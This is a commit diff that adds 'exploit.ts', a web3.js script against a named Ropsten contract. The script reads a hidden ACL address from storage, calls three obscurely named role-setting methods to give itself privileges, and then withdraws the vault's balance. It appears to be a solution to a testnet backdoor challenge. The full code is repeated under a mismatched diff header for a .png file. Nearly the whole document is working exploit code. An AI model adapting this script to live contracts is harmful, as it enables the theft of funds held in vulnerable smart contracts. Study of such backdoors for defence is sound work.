ripwu · October 11, 2022 06:45
diff --git a/exploit.ts b/exploit.ts
 // https://medium.com/nomic-labs-blog/malicious-backdoors-in-ethereum-proxies-62629adf3357

 const MyAccountAddr = '0xbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';
 const MyAccountKey = '0xbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';
 const RopstenInfuraNode = 'https://ropsten.infura.io/v3/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';
 const RopstenNetworkId = '3';

 const Web3 = require('web3');
 const web3 = new Web3(RopstenInfuraNode);

 async function getAddressAtStorage(contract, slot) {
 	var address = await web3.eth.getStorageAt(contract, slot);
 	address = `0x${address.slice(-40)}`;
 	return address;
 }

 async function sendTx(tx, value, to, gasLimit = undefined) {
 	const gas = gasLimit || await tx.estimateGas({from: MyAccountAddr});
 	const gasPrice = await web3.eth.getGasPrice();
 	const nonce = await web3.eth.getTransactionCount(MyAccountAddr);

 	const options = {
 		to,
 		data: tx.encodeABI(),
 		value,
 		gas: gas * 20,
 		gasPrice: gasPrice * 10,
 		nonce,
 		chainId: RopstenNetworkId
 	};

 	const signedTx = await web3.eth.accounts.signTransaction(options, MyAccountKey);
 	await web3.eth.sendSignedTransaction(signedTx.rawTransaction);
 }

 async function main() {
    const targetContract = '0xB97DD0102bB67f81d25D686C661d7F0AED62E344';

    // 0.
    const passRequire1 =  0.001 * (10 ** 18);
    const passRequire2 =  0.01 * (10 ** 18);

    const balance = await web3.eth.getBalance(targetContract);
    const balanceMy = await web3.eth.getBalance(MyAccountAddr);

    const value = Number(balance) + passRequire2;
    console.log("balance, balaceMy, value", balance, balanceMy, value);


    if ((Number(balance) < passRequire1) || (Number(balanceMy) < value)) {
        return;
    }

    // 1.
    const acl = await getAddressAtStorage(targetContract, 0);

    const ACLContractABI = require('../build/contracts/ACL.json').abi;
    const aclContract = new web3.eth.Contract(ACLContractABI, acl);

    // 2.
    console.log("sendTx setACLRole7123909213907581092");
    const txSetACLRole7123909213907581092 = aclContract.methods.setACLRole7123909213907581092(MyAccountAddr);
    await sendTx(txSetACLRole7123909213907581092, 0, acl);

    console.log("sendTx setACLRole8972381298910001230");
    const txSetACLRole8972381298910001230 = aclContract.methods.setACLRole8972381298910001230(MyAccountAddr);
    await sendTx(txSetACLRole8972381298910001230, 0, acl);

    console.log("sendTx setACLRole5999294130779334338");
    const txSetACLRole5999294130779334338 = aclContract.methods.setACLRole5999294130779334338(MyAccountAddr);
    await sendTx(txSetACLRole5999294130779334338, 0, acl);

    // 3.
    const VaultContractABI = require('../build/contracts/Vault.json').abi;
    const vaultContract = new web3.eth.Contract(VaultContractABI, targetContract);

    console.log("sendTx withdraw");
    const txWithdraw = vaultContract.methods.withdraw();
    await sendTx(txWithdraw, value, targetContract, 100000);
 }

 main();
diff --git a/UnstructuredStorageProxy.png b/UnstructuredStorageProxy.png
	// https://medium.com/nomic-labs-blog/malicious-backdoors-in-ethereum-proxies-62629adf3357

	const MyAccountAddr = '0xbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';
	const MyAccountKey = '0xbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';
	const RopstenInfuraNode = 'https://ropsten.infura.io/v3/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';
	const RopstenNetworkId = '3';

	const Web3 = require('web3');
	const web3 = new Web3(RopstenInfuraNode);

	async function getAddressAtStorage(contract, slot) {
	var address = await web3.eth.getStorageAt(contract, slot);
	address = `0x${address.slice(-40)}`;
	return address;
	}

	async function sendTx(tx, value, to, gasLimit = undefined) {
	const gas = gasLimit \|\| await tx.estimateGas({from: MyAccountAddr});
	const gasPrice = await web3.eth.getGasPrice();
	const nonce = await web3.eth.getTransactionCount(MyAccountAddr);

	const options = {
	to,
	data: tx.encodeABI(),
	value,
	gas: gas * 20,
	gasPrice: gasPrice * 10,
	nonce,
	chainId: RopstenNetworkId
	};

	const signedTx = await web3.eth.accounts.signTransaction(options, MyAccountKey);
	await web3.eth.sendSignedTransaction(signedTx.rawTransaction);
	}

	async function main() {
	const targetContract = '0xB97DD0102bB67f81d25D686C661d7F0AED62E344';

	// 0.
	const passRequire1 = 0.001 * (10 ** 18);
	const passRequire2 = 0.01 * (10 ** 18);

	const balance = await web3.eth.getBalance(targetContract);
	const balanceMy = await web3.eth.getBalance(MyAccountAddr);

	const value = Number(balance) + passRequire2;
	console.log("balance, balaceMy, value", balance, balanceMy, value);


	if ((Number(balance) < passRequire1) \|\| (Number(balanceMy) < value)) {
	return;
	}

	// 1.
	const acl = await getAddressAtStorage(targetContract, 0);

	const ACLContractABI = require('../build/contracts/ACL.json').abi;
	const aclContract = new web3.eth.Contract(ACLContractABI, acl);

	// 2.
	console.log("sendTx setACLRole7123909213907581092");
	const txSetACLRole7123909213907581092 = aclContract.methods.setACLRole7123909213907581092(MyAccountAddr);
	await sendTx(txSetACLRole7123909213907581092, 0, acl);

	console.log("sendTx setACLRole8972381298910001230");
	const txSetACLRole8972381298910001230 = aclContract.methods.setACLRole8972381298910001230(MyAccountAddr);
	await sendTx(txSetACLRole8972381298910001230, 0, acl);

	console.log("sendTx setACLRole5999294130779334338");
	const txSetACLRole5999294130779334338 = aclContract.methods.setACLRole5999294130779334338(MyAccountAddr);
	await sendTx(txSetACLRole5999294130779334338, 0, acl);

	// 3.
	const VaultContractABI = require('../build/contracts/Vault.json').abi;
	const vaultContract = new web3.eth.Contract(VaultContractABI, targetContract);

	console.log("sendTx withdraw");
	const txWithdraw = vaultContract.methods.withdraw();
	await sendTx(txWithdraw, value, targetContract, 100000);
	}

	main();